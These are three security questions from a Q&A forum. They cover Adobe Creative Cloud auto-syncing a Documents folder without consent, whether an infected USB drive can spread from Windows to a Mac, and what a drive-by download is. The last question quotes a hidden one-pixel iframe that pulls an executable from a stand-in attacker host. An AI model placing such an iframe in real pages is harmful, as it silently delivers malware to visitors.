Is Adobe Creative Cloud uploading files from hard drive without my permission?

I was trying to uninstall InDesign from my Windows 10 computer. To uninstall/update any of Adobe’s programs, you have to first update to the latest version of Creative Cloud, which is a hub that manages all its programs (PS, Illustrator, AfterEffects, etc). Once the update was complete, I uninstalled InDesign, but noticed that there was a small progress indicator on the top-right corner.

When I opened it, I saw that it said “File syncing” was in progress. I thought “What file syncing? I never asked to sync any files!”

enter image description here

I immediately paused the sync. Upon clicking on the settings icon, it turns out it was auto-syncing files from my entire C:/Users/[UserName]/Documents/ folder, without asking for any permission to do this! (I’ve since created an empty /Adobe subfolder so it doesn’t have anything to upload).

enter image description here

I think I stopped it before it was able to upload anything. Has Adobe been automatically uploading files from its users’ /Documents folder without their consent, or am I overreacting? If so, is there a way to blacklist all internet access to all of Adobe’s products? I don’t want the next update to reset these permissions, and having to worry about auto-syncing in future versions!

Can an windows infected USB drive infect a MacBook?

I recently had a virus on my windows 10, at some point I plugged in a usb drive to it (didn’t transfer any files). But assuming it was infected, can it infect, or simply transfer anything from it to my MacBook?

I didn’t transfer anything from the usb to my MacBook, I have only transferred files from the MacBook to the usb, and I secure erase the usb with my macbook.

Thank You for your help.

Drive by download with iframes

does the definition of a drive by download include malicious execution of an unaccepted downloaded file or is the unaccepted download of a file the drive by download by itself. I didn’t find a good/clear definition.

Why is it possible to download files with a hidden iframe, so the user isn’t even asked if he wants to download it. Something like this:

<iframe src="https://attacker.com/evil.exe" width="1" height="1" frameborder="0"></iframe> 

Isnt this way to risky?

Thank you for your answers.